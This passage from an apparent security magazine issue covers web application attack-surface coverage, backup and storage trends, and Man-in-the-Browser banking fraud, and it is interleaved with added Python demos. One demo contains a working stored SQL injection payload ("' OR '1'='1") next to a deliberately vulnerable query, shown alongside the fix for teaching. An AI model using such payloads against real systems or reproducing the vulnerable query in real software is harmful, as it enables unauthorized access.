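  xmlns:tns="urn:example:accounts" targetNamespace="urn:example:accounts">
  <types><xsd:schema targetNamespace="urn:example:accounts">
    <xsd:element name="GetBalance"><xsd:complexType><xsd:sequence>
      <xsd:element name="accountId" type="xsd:string"/>
    </xsd:sequence></xsd:complexType></xsd:element>
    <xsd:element name="Transfer"><xsd:complexType><xsd:sequence>
      <xsd:element name="fromAccount" type="xsd:string"/>
      <xsd:element name="toAccount" type="xsd:string"/>
      <xsd:element name="amount" type="xsd:decimal"/>
    </xsd:sequence></xsd:complexType></xsd:element>
    <xsd:element name="ResetLimits"><xsd:complexType><xsd:sequence>
      <xsd:element name="accountId" type="xsd:string"/>
    </xsd:sequence></xsd:complexType></xsd:element>
  </xsd:schema></types>
  <message name="GetBalanceIn"><part name="body" element="tns:GetBalance"/></message>
  <message name="TransferIn"><part name="body" element="tns:Transfer"/></message>
  <message name="ResetLimitsIn"><part name="body" element="tns:ResetLimits"/></message>
  <portType name="AccountsPortType">
    <operation name="GetBalance"><input message="tns:GetBalanceIn"/></operation>
    <operation name="Transfer"><input message="tns:TransferIn"/></operation>
    <operation name="ResetLimits"><input message="tns:ResetLimitsIn"/></operation>
  </portType>
  <binding name="AccountsSoap" type="tns:AccountsPortType">
    <soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
    <operation name="GetBalance"><soap:operation soapAction="urn:accounts#GetBalance"/></operation>
    <operation name="Transfer"><soap:operation soapAction="urn:accounts#Transfer"/></operation>
    <operation name="ResetLimits"><soap:operation soapAction="urn:accounts#ResetLimits"/></operation>
  </binding>
  <service name="AccountsService"><port name="AccountsPort" binding="tns:AccountsSoap">
    <soap:address location="https://api.example.test/accounts"/>
  </port></service>
</definitions>"""


def _local(qname):
    """'tns:GetBalance' -> 'GetBalance' (assumes a single target namespace)."""
    return qname.split(":", 1)[-1]


def map_attack_surface(wsdl_text):
    """Return one record per portType operation: name, SOAPAction, endpoints, input params."""
    root = ET.fromstring(wsdl_text)
    # message name -> schema element carried by its (single) part
    messages = {m.get("name"): _local(m.find("wsdl:part", NS).get("element"))
                for m in root.findall("wsdl:message", NS)}
    # schema element name -> [(parameter name, xsd type)] of its sequence children
    params = {}
    for el in root.findall("wsdl:types/xsd:schema/xsd:element", NS):
        params[el.get("name")] = [(p.get("name"), _local(p.get("type")))
                                  for p in el.iter("{%s}element" % NS["xsd"]) if p is not el]
    # binding operation name -> SOAPAction header the server dispatches on
    actions = {op.get("name"): op.find("soap:operation", NS).get("soapAction")
               for op in root.findall("wsdl:binding/wsdl:operation", NS)}
    endpoints = [a.get("location")
                 for a in root.findall("wsdl:service/wsdl:port/soap:address", NS)]
    surface = []
    for op in root.findall("wsdl:portType/wsdl:operation", NS):
        msg = _local(op.find("wsdl:input", NS).get("message"))
        surface.append({"operation": op.get("name"),
                        "soap_action": actions.get(op.get("name")),
                        "endpoints": endpoints,
                        "params": params.get(messages[msg], [])})
    return surface


def api_coverage(surface, tested_ops):
    """Fraction of operations exercised, plus the ones a vulnerability-only report would hide."""
    names = [s["operation"] for s in surface]
    untested = [n for n in names if n not in tested_ops]
    return (len(names) - len(untested)) / len(names), untested


if __name__ == "__main__":
    surface = map_attack_surface(SAMPLE_WSDL)
    for s in surface:
        print(s["operation"], s["soap_action"], s["params"])
    frac, missing = api_coverage(surface, {"GetBalance", "Transfer"})
    print("operation coverage %.0f%%, untested: %s" % (100 * frac, missing))
```

The untested list is the point: a report that found an injection in Transfer but never sent a request to ResetLimits is describing two thirds of this API, and the coverage number makes that visible.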






Code perspective

The code-coverage perspective is the most difficult, aiming to achieve complete (dynamic) coverage of the source code. Mapping script events, buttons, menus and other components to specific code segments is hard, and without specialized tools it often proves impractical.

This methodology also addresses a critical component not covered by the two previous approaches: back-end code. Inevitably, applications have back-end processes which cannot be "seen" from the user interface or the APIs. These back-end processes may cause security issues which cannot be understood without this perspective.

One example of this is a stored (second-order) SQL injection vulnerability. Injecting SQL into a particular form field may not cause a security issue at that point because the code path that stores it handles the input correctly, for instance with a parameterized query. However, when a web-service call is later made against a supporting service, a back-end process transports the tainted data into another database, this time concatenating it into a query, creating a SQL injection condition that leads to an exploit. Without knowledge of the back-end process, the tester cannot know what happens to tainted data that is not visible from the UI. There are numerous other examples, including "dead" code branches which can pose critical risks to application security in later development cycles.
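The stored (second-order) SQL injection scenario above, as an added example that is not part of the original article. The web handler, the nightly job, the schema and the payload are constructed to illustrate the point: the first hop binds the input as a parameter and is safe in isolation, the back-end job concatenates the stored value into a second query and is not, and a tester who only exercises the form never sees the injection fire.

```python
"""Second-order ("stored") SQL injection: the web tier stores input safely,
a back-end job later concatenates it into SQL. Added example; the schema,
the job and the payload are constructed for illustration."""
import sqlite3

ATTACKER_INPUT = "' OR '1'='1"   # constructed payload typed into the profile form


def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE profiles (id INTEGER PRIMARY KEY, display_name TEXT);
        CREATE TABLE accounts (username TEXT PRIMARY KEY,
                               verified INTEGER NOT NULL DEFAULT 0);
        INSERT INTO accounts (username) VALUES ('alice'), ('bob'), ('carol');
    """)
    return db


def profile_form_handler(db, display_name):
    """First hop (visible from the UI): parameterized, so the payload is stored inertly."""
    db.execute("INSERT INTO profiles (display_name) VALUES (?)", (display_name,))
    db.commit()


def nightly_verification_job_vulnerable(db):
    """Second hop (invisible from UI and API): trusts stored data and concatenates it into SQL."""
    names = [row[0] for row in db.execute("SELECT display_name FROM profiles")]
    for name in names:
        # becomes: ... WHERE username = '' OR '1'='1'   -> every account is verified
        db.execute("UPDATE accounts SET verified = 1 WHERE username = '%s'" % name)
    db.commit()


def nightly_verification_job_fixed(db):
    """Same job with the stored value bound as a parameter: nothing in it is parsed as SQL."""
    names = [row[0] for row in db.execute("SELECT display_name FROM profiles")]
    for name in names:
        db.execute("UPDATE accounts SET verified = 1 WHERE username = ?", (name,))
    db.commit()


def verified_accounts(db):
    return [r[0] for r in db.execute(
        "SELECT username FROM accounts WHERE verified = 1 ORDER BY username")]


def run(job):
    """Submit the payload through the form, run the back-end job, report what got verified."""
    db = new_db()
    profile_form_handler(db, ATTACKER_INPUT)
    job(db)
    return verified_accounts(db)


if __name__ == "__main__":
    print("vulnerable job verified:", run(nightly_verification_job_vulnerable))
    print("fixed job verified:     ", run(nightly_verification_job_fixed))
```

A dynamic test against the form alone reports nothing, because the form handler is correct; only a code-perspective view (or a test that also drives the job and inspects its queries) attributes the defect to the second hop.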

Mapping an application through its source code provides an extremely thorough view of the total attack surface, but it can be a complex task requiring highly sophisticated tools. Such tools combine static analysis of the source code with dynamic observation of the running application (a hybrid approach) to achieve a full mapping of the total application attack surface.

Generalized analysis

The simplest way to measure the coverage of a web application is to determine whether each of the components has been exercised, tested, and validated in a security testing framework. Whether through the use of tools or manual processes, understanding coverage is paramount to knowing the security risks an application poses beyond "found vulnerabilities."

Generalized analysis involves pure component-based calculation of the attack surface, without context or workflow. For example, in generalized analysis, a tester simply lists out all the exposed UI components and marks them off as each is exercised and tested: each form, parameter, JavaScript event handler, each XDR (Cross-Domain Request) and so on, as they are identified, logged, exercised and tested.

Generalized analysis can be achieved quickly as it is less organized and requires less formal structure. This method does not guarantee a complete coverage measurement, although it is a significant improvement over no measurement at all.
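Generalized analysis as described here, together with the UI-perspective inventory it depends on, as an added example that is not part of the original article. It parses a constructed HTML page with Python's html.parser, lists every form, parameter, link, JavaScript event handler and cross-domain request it finds, then ticks them off against a constructed tester log and reports coverage per component kind. The application origin and the page are assumptions; AJAX calls issued from script bodies are not parsed here and would need the request/response capture discussed under the UI perspective.

```python
"""Generalized (component-based) coverage: inventory the UI attack surface
of a page and tick components off as they are exercised. Added example;
the origin, the HTML page and the tester's log are constructed."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

APP_ORIGIN = "https://app.example.test"   # assumed origin of the application under test

SAMPLE_PAGE = """<html><body>
<form id="login" action="/login" method="post">
  <input name="user"><input name="pass" type="password">
  <input type="hidden" name="next" value="/home">
</form>
<form action="//partner.example.net/track" method="get"><input name="q"></form>
<a href="/account/statement">Statement</a>
<a href="/admin/export" onclick="return confirmExport()">Export</a>
<select name="region" onchange="loadRegion(this.value)"><option>EU</option></select>
<script src="https://cdn.example.net/widget.js"></script>
<img src="/static/logo.png" onerror="report('logo')">
</body></html>"""

EVENT_ATTRS = ("onclick", "onchange", "onsubmit", "onerror", "onload", "onkeyup", "onblur")


class SurfaceInventory(HTMLParser):
    """Collect forms, parameters, links, JavaScript event handlers and cross-domain requests."""

    def __init__(self):
        super().__init__()
        self.components = {}      # component id -> kind
        self._form = None         # action of the form currently being parsed

    def _add(self, kind, ident):
        self.components["%s:%s" % (kind, ident)] = kind

    def _cross_domain(self, url):
        target = urlsplit(urljoin(APP_ORIGIN + "/", url)).netloc
        return bool(target) and target != urlsplit(APP_ORIGIN).netloc

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = a.get("action", "")
            self._add("form", "%s %s" % (a.get("method", "get").upper(), self._form))
            if self._cross_domain(self._form):
                self._add("xdr", self._form)
        elif tag in ("input", "select", "textarea") and "name" in a:
            self._add("param", "%s?%s" % (self._form or "-", a["name"]))
        elif tag == "a" and "href" in a:
            self._add("link", a["href"])
        src = a.get("src")
        if src and self._cross_domain(src):
            self._add("xdr", src)
        label = a.get("id") or a.get("name") or a.get("href") or a.get("src") or ""
        for attr in EVENT_ATTRS:
            if attr in a:
                self._add("event", "%s[%s].%s" % (tag, label, attr))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def inventory(html):
    p = SurfaceInventory()
    p.feed(html)
    p.close()
    return p.components


def coverage_report(components, exercised):
    """Overall coverage, (done, total) per component kind, and the untested surface."""
    untested = sorted(c for c in components if c not in exercised)
    by_kind = {}
    for c, kind in components.items():
        done, total = by_kind.get(kind, (0, 0))
        by_kind[kind] = (done + (c in exercised), total + 1)
    overall = (len(components) - len(untested)) / len(components) if components else 0.0
    return overall, by_kind, untested


# Constructed tester log: component ids actually driven during the engagement.
TESTER_LOG = {
    "form:POST /login", "param:/login?user", "param:/login?pass",
    "link:/account/statement", "xdr:https://cdn.example.net/widget.js",
}

if __name__ == "__main__":
    overall, by_kind, untested = coverage_report(inventory(SAMPLE_PAGE), TESTER_LOG)
    print("overall %.0f%% by kind %s" % (100 * overall, by_kind))
    print("untested:", *untested, sep="\n  ")
```

The per-kind breakdown is what a consumer of the report needs: here every form and the login parameters were exercised, but no event handler was, and the hidden "next" parameter and the partner cross-domain form were never touched.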






Coverage-complete analysis

Workflow-based analysis is another methodology that comes closer to understanding the completeness of coverage, but at the sacrifice of analysis speed.

Combining all three perspectives, including code-level analysis, this approach seeks to build a complete map of the application attack surface before exercising and attacking the exposed components.

One of the ways to achieve coverage-complete analysis is through the use of EFDs to map the application. This approach combines the three perspectives, UI, API and code, into coherent workflows through the application. EFD-based analysis leverages application requirements to build a complete map of the attack surface, and can come close to achieving 100% coverage completeness. Automation solutions with tight integration between application requirements and test plans can greatly support this approach.
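Workflow-based coverage over an EFD, as an added example that is not part of the original article. The EFD (a directed graph of UI actions, API calls and back-end jobs), the required workflows derived from requirements and the test log of sessions are all constructed. A workflow counts as covered only when some session walked it end to end in order, which is what separates this measurement from the component checklist of generalized analysis; the edge report shows which transitions no session exercised.

```python
"""Coverage-complete (workflow-based) measurement over an Execution Flow
Diagram. Added example: the EFD, the requirements and the test log are
constructed and the application is fictitious."""

# EFD as a directed graph: step -> steps reachable from it. Steps span all three
# perspectives: UI actions (ui:), API calls (api:) and back-end jobs (job:).
EFD = {
    "ui:login": ["ui:dashboard"],
    "ui:dashboard": ["ui:new_payee", "ui:transfer", "ui:statement"],
    "ui:new_payee": ["api:payees.create"],
    "api:payees.create": ["ui:dashboard"],
    "ui:transfer": ["api:transfer.submit"],
    "api:transfer.submit": ["job:fraud_screen"],
    "job:fraud_screen": ["job:ledger_post", "ui:transfer_declined"],
    "job:ledger_post": ["ui:transfer_receipt"],
    "ui:transfer_receipt": [],
    "ui:transfer_declined": [],
    "ui:statement": ["api:statement.export"],
    "api:statement.export": [],
}

# Workflows the requirements say must exist, each expressed as a path through the EFD.
REQUIRED_WORKFLOWS = {
    "R1 pay existing payee": ["ui:login", "ui:dashboard", "ui:transfer", "api:transfer.submit",
                              "job:fraud_screen", "job:ledger_post", "ui:transfer_receipt"],
    "R2 add payee": ["ui:login", "ui:dashboard", "ui:new_payee", "api:payees.create",
                     "ui:dashboard"],
    "R3 declined transfer": ["ui:login", "ui:dashboard", "ui:transfer", "api:transfer.submit",
                             "job:fraud_screen", "ui:transfer_declined"],
    "R4 export statement": ["ui:login", "ui:dashboard", "ui:statement", "api:statement.export"],
}

# Constructed test log: each session is the ordered list of steps the tester drove.
TEST_LOG = [
    ["ui:login", "ui:dashboard", "ui:transfer", "api:transfer.submit", "job:fraud_screen",
     "job:ledger_post", "ui:transfer_receipt"],
    ["ui:login", "ui:dashboard", "ui:statement"],            # stopped before the export API
    ["ui:login", "ui:dashboard", "ui:new_payee", "api:payees.create", "ui:dashboard"],
]


def validate_path(path):
    """Reject workflows that are not walkable in the EFD (a requirements/EFD mismatch)."""
    return all(b in EFD.get(a, []) for a, b in zip(path, path[1:]))


def edges_of(path):
    return set(zip(path, path[1:]))


def contains_path(session, path):
    """True if the workflow appears as a contiguous, ordered subsequence of the session."""
    n = len(path)
    return any(session[i:i + n] == path for i in range(len(session) - n + 1))


def workflow_coverage(workflows, log):
    """Fraction of required workflows walked end to end, and the names of those that were not."""
    covered = {name for name, path in workflows.items()
               if any(contains_path(s, path) for s in log)}
    return len(covered) / len(workflows), sorted(set(workflows) - covered)


def edge_coverage(efd, log):
    """Fraction of EFD transitions exercised by any session, and the transitions never walked."""
    all_edges = {(a, b) for a, nxt in efd.items() for b in nxt}
    walked = set().union(*(edges_of(s) for s in log))
    return len(walked & all_edges) / len(all_edges), sorted(all_edges - walked)


if __name__ == "__main__":
    assert all(validate_path(p) for p in REQUIRED_WORKFLOWS.values())
    wf, missing = workflow_coverage(REQUIRED_WORKFLOWS, TEST_LOG)
    ef, unwalked = edge_coverage(EFD, TEST_LOG)
    print("workflow coverage %.0f%%, not covered: %s" % (100 * wf, missing))
    print("edge coverage %.0f%%, never walked: %s" % (100 * ef, unwalked))
```

Note how the two numbers disagree: ten of twelve transitions were walked, yet only half of the required workflows were, because session 2 stopped one step short of the export and nobody drove a declined transfer through the fraud screen.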

Further research

It's clear that further research is needed for accurately mapping the "security coverage" of an application. While today's vulnerability-based reporting provides users with a prioritized list of vulnerabilities to manage, the next step would be to incorporate an assessment that accounts for an application's test coverage.

Businesses cannot afford to leave their application risk assessment unaddressed, as it may lead to unforeseen catastrophic failures that result in high costs.



Rafal Los is a web application security evangelist for the HP Software & Solutions business at HP (www.hp.com). Los is responsible for bridging industry, customers and solutions, closing the gaps between security technologies and business needs. Los also demonstrates how HP Application Security Center solutions can help organizations reduce risk and bring business value through measurable gains in enterprise web application security.




How much data do we create? How do we secure it? Store it? Retrieve it? 



When professional community Wikibon re- 
cently translated the amount of digital informa- 
tion that is estimated to be created in 2010 in 
more physical terms, they calculated that to 
store all that data would require 75 billion fully- 
loaded 16 GB Apple iPads. It makes the mind 
reel, doesn't it? 

It was also noted that the amount of digital in- 
formation created today surpasses by 35 per- 
cent the capacity of storage space that is cur- 
rently available, and that the percentage will 
only be getting bigger as the years pass. 

If this statistic and prediction sound too wild to 
be credible, just pause a moment and think 
about how much content you yourself produce 
every day - at home and at work. 

Then multiply that number by the latest estimate of the number of Internet users (it was 1,966,514,816 on June 30, 2010, by the way). It doesn't sound that far-fetched anymore, does it?



Well, the point that I really wanted to make with this brief introduction is that the human race seems to be pouring out massive amounts of data as if the world were going to end tomorrow.

Some of it will vanish into the far reaches of 
this global system of networks that we call the 
Internet, fragments of it stored in various 
places, but for all effective purposes lost be- 
cause it will be unsearchable. And that's all 
right, since most of it wasn't meant to be 
saved anyway. 

But what about the data we do want to save? 
The seemingly inexorable progress of the hu- 
man race is tied closely to our learning capa- 
bilities and the fact that we can access the 
knowledge left to us by our ancestors - 
whether they used stone tablets, books, or 
data storage devices. 

The decisions that we make daily are largely 
based on the information we have at our dis- 
posal. Whether these decisions concern our 
private or business life, we need information. 
So now we come to the crux of the matter and this article: what do we know and what can we expect in the future where data storage and the backup process are concerned?

The recently concluded bidding war between 
Dell and HP to acquire 3PAR has put the spot- 
light on the storage sector, and has indicated 
that cloud storage - however omnipresent the 
concept may be currently - is just one of the 
trends that drive this market, and that physical 
data centers are still very much in demand. 

It may be that the time will come when cloud 
storage becomes the mainstream storage 
model, but that still isn't the case. "Cloud stor- 
age definitely solves a major problem - that 
being hardware maintenance," says Adrian 
Gheara, Project Manager, GFI Backup. "Very 
often small companies don't have the re- 
sources for a strong hardware infrastructure 
required by a backup strategy (redundant 



hard-drives, dedicated servers, load balanc- 
ers, an administrator that constantly monitors 
the health of hardware equipment). Cloud 
computing will ensure that for a decent fee 
they get the best possible reliable infrastruc- 
ture for backups." 

Peter Airs, EMEA Storage Product Manager for Netgear, agrees. He thinks that cloud storage is ideal for smaller customers without a second site to replicate data to. "Cost and complexity is massively reduced compared to deploying a tape solution and it is a 'set it and forget it' solution shifting critical data off site as it gets saved locally. And although cloud backup like our embedded ReadyNAS Vault is not replacement disaster recovery for applications, it fits smaller customers looking for peace of mind protection for files while addressing capital expenditure with a pay-as-you-go model."






Larger enterprises and mid-size organizations 
can also benefit from the cloud option, even if 
they have already implemented high availabil- 
ity or disk-to-disk backup, thinks Christian Wil- 
lis, EMEA Technical Director for Vision Solu- 
tions. He believes that cloud storage and re- 
covery can complement their existing strategy 
and further reduce recovery time and recovery 
point objectives. 

As regards the matter of data security, he 
says that apart from defining and sticking to 
best practices such as encrypting information 
before it goes off-site and using secure net- 
works to move the data, it is of crucial impor- 
tance to specify what responsibilities the cloud 
provider will take on, and what will remain with 
the company. 

Willis is convinced that the likes of Amazon 
and the other major cloud providers have such 
large estates and established security proce- 
dures that data at rest is protected - the stan- 
dards at which they work are comparable or 
better than those you can achieve as a single 
organization. 



GFI's Gheara believes that the trend that has seen many large enterprises moving to cloud backups will continue unabated. "A very important advantage of cloud storage is that your backup is remote," he says.

"If there's a fire in the office, the backup will 
not be destroyed or damaged as well. The 
only disadvantage with a cloud-based solution 
is speed. If a restore is needed, the download 
will take some time. In the long term, down- 
loads speeds will go up and costs will go 
down, so cloud backups will become easier 
and better. As to security, encryption and data 
distribution across multiple machines will 
cover these risks." 

What is interesting to note is that when it 
comes to backup, a lot of organizations are 
focused on data protection, and it's often the 
case that the quality and speed of the recov- 
ery process - which is, after all, the reason 
they are doing it in the first place - tends to be 
overlooked. 
Simplicity and ease of use are also of great importance. "Everybody knows how important backups are. Yet there are still epic tales of people losing all their files, sometimes going out of business in the process," muses Gheara.

"The truth is that people are lazy. They know 
they have to backup their data and want to do 
so, but because of the complexity to set up 
and create backups they tend to postpone, or 
avoid doing so. And disasters usually strike 
when you're least prepared. Providing an 
easy-to-understand user-experience is a key 
factor to get people to actually create back- 
ups. With GFI Backup for Business, for exam- 
ple, usability is something we pay particular 
attention to. We are constantly trying to make 
the process simpler and easier." 

Netgear's Airs concurs, especially when it 
comes to small business and mid-sized enter- 
prises. He notes that backup always consists 
of a hardware and software component and it 
is up to vendors to ensure that these compo- 
nents dovetail to provide a cost effective, high 
performance yet trouble free experience for 
the customer. 

Vision Solutions' Willis says that ease of use 
is especially important when it comes to 
backup being deployed across multiple differ- 
ent platforms. "Virtualization has made some 
elements of backup easier, but it has also in- 
troduced some new challenges to consider," 
he says. "As an example, if a company has 
VMware within its main HQ, but is running Mi- 
crosoft Hyper-V in its branch offices for rea- 
sons of cost, then it can have some problems 
in making sure that all its virtual machines are 
properly protected." 

And while Toshiba provides only consumer backup solutions, Manuel Camarena, product manager at Toshiba's Storage Device Division, points out that while the majority of people do seem to be aware of the importance of regularly backing up their computers, a recent survey they sponsored revealed that 54 percent of them say that they simply forget about it. To try to influence that situation for the better, they issued a line of portable hard disk drives that include pre-loaded backup software with an easy setup process and "set-it-and-forget-it" operation.



But while ease of use is (predictably) an im- 
portant characteristic of backup solutions 
(business or otherwise), it is definitely not the 
only one on which my interviewers agree. 
When it comes to business backup, a central- 
ized backup management solution also seems 
to be preferred. 

"SMBs have particular resource challenges 
but centralizing into a single easy to manage 
platform that can take care of all of a busi- 
ness's storage and backup needs makes 
sense from a financial and management over- 
head point of view," says Airs. 

He also thinks that SMBs are often relying on backup and disaster recovery policies being adhered to by staff whose primary function is elsewhere in the business, meaning that backups don't get done and tapes are not managed correctly, and says that many of these issues can be addressed by moving to a centralized disk storage system and an automated backup regime which requires minimal human intervention once set up.

"For companies with multiple computers it is 
important to have an easy administration 
panel, that allows a centralized management 
of tasks; otherwise it's very likely that prob- 
lems will arise during the backup process and 
nobody will ever know," concurs Gheara. 

According to the results of a recent storage study by TheInfoPro, data de-duplication is a leading technology when it comes to backup on companies' existing storage resources but, interestingly enough, online data de-duplication and data reduction appear to be a waning technology.

But what do these experts think about it? 

"Data de-duplication is relevant only for large companies. It works very well with cloud storage for reduced traffic," says Gheara. "In small companies, due to the lower volume of data that is transferred, de-duplication is not really necessary; and may not be a viable option because of the need to set up the software and its cost."

Airs says that, so far, Netgear's customers haven't shown much inclination towards it, and prefer to ride the cost/capacity curve for the time being and to employ higher capacity storage systems. He thinks that its time will come, but that adoption is slower due to the lower capacity requirements and the time and budget pressure in the small business and mid-sized enterprise space.

But to return for a moment to the 75 billion fully-loaded 16 GB Apple iPads from the beginning of the article and the storage issue: Toshiba recently made a significant inroad with a new technology that will improve areal disk density and allow us to store five times the amount of data per square inch that we can store today.

"As perpendicular magnetic recording (PMR) - the current HDD industry standard - nears its fundamental capacity limit, the industry is investigating new technologies to increase areal density," says Patty Kim, product manager at Toshiba's Storage Device Division. "Bit-patterned media (BPM) is one approach. Two others that hold significant interest are heat assisted magnetic recording (HAMR) and microwave assisted magnetic recording (MAMR). Toshiba is evaluating these approaches, all of which have potential technical hurdles, but the developments we've made with BPM certainly make it a strong contender for future production."

So far, Toshiba has managed to fabricate a hard disk with an areal density of 2.5 terabits per square inch and a practical servo pattern by using an etching mask made of a self-assembled polymer, but has not yet managed to read or write data on such drives. Obviously, a considerable amount of time will pass before this technology becomes standard, but they predict that a density of 5 Tb/in² will be achievable in the lab by 2012.






And while Seagate seems to have opted for heat assisted magnetic recording, and Hitachi GST for bit-patterned media, so far no drive manufacturer has put all its eggs in one basket. Setting aside the issue of disk density, I also wondered whether the self-encryption capability of some of Toshiba's drives was becoming a strong selling point, and asked if they had noticed an increase in demand.

"Absolutely. Many customers see them as the 
best - and most cost effective - way to protect 
'data at rest' on PCs and storage systems," 
says Scott Wright, product manager for mobile 
storage with Toshiba's Storage Device Divi- 
sion. "The interest stems not only from the 
desire to protect against the potential data and 
economic loss from a lost or stolen notebook, 
but also from the need for IT departments to 
manage their compliance with privacy laws 
and regulations governing data security. This 
is particularly true for highly regulated enter- 
prises in such industries as health care and 
finance. However, regardless of the type of 
business, the simple fact is that all disk media 



eventually leaves a company's control, 
whether it's decommissioned, disposed of, 
sent for repair, misplaced or stolen." 

And when it comes to drives that are withdrawn from service and disposed of, Toshiba has also thought about and implemented a wipe technology for its self-encrypting drives (SEDs): the drive automatically erases its internal security key when its power supply is turned off, such as when a system is powered down or when the drive is removed from the system, instantly making all data on the drive indecipherable. Since the data itself is never rewritten, only the key, the erase is instant, but it also means the drive's key management, not the media, is what the disposal process has to trust.

In the end, it seems to me that even though 
there are vast amounts of data that must be 
stored, and stored well, the good news is that 
we don't lack in options to choose from. 

There may be glitches here and there, but no 
technology is or ever will be flawless. That is a 
fact that we must accept, and learn to always 
have a (no pun intended!) backup plan. 



Zeljka Zorz is the News Editor for Help Net Security and (IN)SECURE Magazine.
Here are some of the Twitter feeds we follow closely and can recommend to anyone interested in learning more about security, as well as engaging in interesting conversations on the subject.

If you want to suggest an account to be added to this list, send a message to @helpnetsecurity on Twitter. Our favorites for this issue are:



@chriseng 

Chris Eng - Senior Director of Security Research at Veracode. 
http://twitter.com/chriseng 



@armorguy

Martin Fisher - Director of IT Security at WellStar Health System. 
http://twitter.com/armorguy 



@jack_daniel 

Jack Daniel - Community Development Manager for Astaro. 
http://twitter.com/jack_daniel 



@alexeck 

Alex Eckelberry - CEO at Sunbelt Software. 
http://twitter.com/alexeck 
Not too many years ago, the Internet became a way for people to access their banking information and to execute some basic financial transactions. At the time, online banking was a relatively safe practice. The threats came largely from hackers who were more intent on creating mayhem than committing a serious financial crime - in short, a situation that was very different from the one we have today.



It is not surprising that an increase in online fraud has mirrored the growth of online banking. The early phishing attacks - orchestrated largely by "script kiddies" - have evolved into sophisticated malware attacks orchestrated by organized crime rings.

Notorious malware, such as the Zeus Trojan, capable of eluding many of the solutions put in place by financial institutions, has become the norm. As Gartner pointed out, "fraudsters have definitely proved that strong two-factor authentication methods that communicate through user browsers can be defeated." (See Gartner: Where Strong Authentication Fails and What You Can Do About It, December 2009).

The Anti-Phishing Working Group (APWG) recently reported that 48,244 phishing attacks occurred across 28,646 unique domain names during the first half of 2010. And yet, despite those numbers, there was actually a decline in the overall number of unique phishing attacks and domain names when compared with the numbers from the previous year.

This decline could be attributed to the changing tactics employed by the fraudsters. The attacks are now more customized - for example, unique numbers are incorporated into the URLs in order to track targeted victims, and one domain name is used to host multiple attacks.

The decline also coincided with the increase in social engineering attacks and the prevalence of the Zeus malware. (See Anti-Phishing Working Group: Global Phishing Survey: Trends and Domain Name Use in 1H2010, October 2010).



www.insecuremag.com



How do these attacks occur?

The basic pattern of an attack is to disrupt the intended communication between the end user and the financial institution, by misdirecting the user, taking over the user's session, or taking over the entire machine. The malware modifies web sessions at will and initiates fraudulent transactions, all while mimicking a normal session and making it next to impossible for the end user to detect the attack.

Even in instances where an out-of-band One-Time Password (OTP) is used, the malware can alter the transaction without the user being aware, because an OTP that only proves the user (or their token) is present says nothing about the payee and amount the bank actually receives. Some form of out-of-band transaction verification is therefore required, in which the details of the transaction itself are confirmed over a channel the malware does not control.
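The difference between an OTP that merely proves the token is present and an out-of-band code that binds the transaction, as an added example that is not part of the original article. The scheme shown (an HMAC over the payee and amount the user keys into a separate device, which the bank verifies against the transaction it actually received) is an illustration of transaction signing, not any vendor's product; the key, the counter, the challenge and the mule account are constructed.

```python
"""Session OTP versus transaction-bound code against a Man-in-the-Browser.
Added example; the HOTP-style session code follows RFC 4226 truncation, the
transaction code is an illustrative HMAC scheme, and all values are constructed."""
import hashlib
import hmac
import struct

SHARED_KEY = b"demo-token-secret-0123456789abcdef"   # constructed; provisioned into the user's token


def session_otp(key, counter):
    """HOTP-style 6-digit code: proves the token is present, says nothing about the transaction."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[off:off + 4])[0] & 0x7FFFFFFF) % 1_000_000
    return "%06d" % code


def transaction_code(key, payee, amount_cents, challenge):
    """Transaction-bound code: the user keys payee and amount into an out-of-band device,
    so the code commits to what the user intends, plus a bank challenge against replay."""
    msg = ("%s|%d|%s" % (payee, amount_cents, challenge)).encode()
    mac = hmac.new(key, msg, hashlib.sha256).digest()
    return "%06d" % (int.from_bytes(mac[:4], "big") % 1_000_000)


def browser_submits(transfer, mitb_active):
    """The browser sends the transfer; MitB malware rewrites the payee in transit while
    the page the user sees still shows the intended payee."""
    if mitb_active:
        return dict(transfer, payee="MULE-ACCOUNT-9981")   # constructed mule account
    return dict(transfer)


def bank_verify_session_otp(key, counter, code):
    # Only checks that the token was present: an altered transfer passes.
    return hmac.compare_digest(session_otp(key, counter), code)


def bank_verify_transaction_code(key, received, challenge, code):
    # Recomputes over what the bank actually received: an altered payee breaks the match.
    expected = transaction_code(key, received["payee"], received["amount_cents"], challenge)
    return hmac.compare_digest(expected, code)


def run_scenario(mitb_active):
    """Returns (accepted_with_session_otp, accepted_with_transaction_code)."""
    intended = {"payee": "ACME-SUPPLIES-0042", "amount_cents": 125_000}
    challenge = "chal-7f3a"                 # bank-issued, shown to the user out of band
    counter = 17                            # token's event counter
    received = browser_submits(intended, mitb_active)
    otp = session_otp(SHARED_KEY, counter)  # user reads this off the token
    txn_code = transaction_code(SHARED_KEY, intended["payee"],
                                intended["amount_cents"], challenge)
    return (bank_verify_session_otp(SHARED_KEY, counter, otp),
            bank_verify_transaction_code(SHARED_KEY, received, challenge, txn_code))


if __name__ == "__main__":
    print("no malware:  session OTP accepted=%s, txn code accepted=%s" % run_scenario(False))
    print("MitB active: session OTP accepted=%s, txn code accepted=%s" % run_scenario(True))
```

The session OTP accepts the rewritten transfer in both runs because nothing it signs changed; the transaction code is rejected as soon as the payee the bank received differs from the one the user committed to on the separate device.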

These fraudulent online attacks are constantly evolving, often spanning multiple sessions and channels. Many of these attacks - like the latest Man-in-the-Browser attacks - occur after the user has been authenticated. This has prompted Gartner to observe that strong authentication on its own is no longer sufficient. As a result, many of the solutions once thought to be effective against malware, including many put in place by financial institutions, are no longer effective on their own against the latest attacks.






Strategies for success in addressing Man-in-the-Browser attacks

The key to detecting and stopping Man-in-the-Browser attacks, or other aggressive malware, lies in the ability to recognize behavioral changes in a user, often before any monetary transaction happens. Unusual navigation patterns, and even a different browsing speed, can be indicators that something is not "right" in the session: an automated script moves through pages faster than a person and skips the pages a person would pass through. Without these early indicators, transactions may seem fine to the banking application.

Financial institutions need to understand the complexity of today's attacks and the value of the tools they have available. Organizations must take a proactive, layered approach to protecting online users, whether individuals or businesses. They should implement a three-pronged strategy that involves:

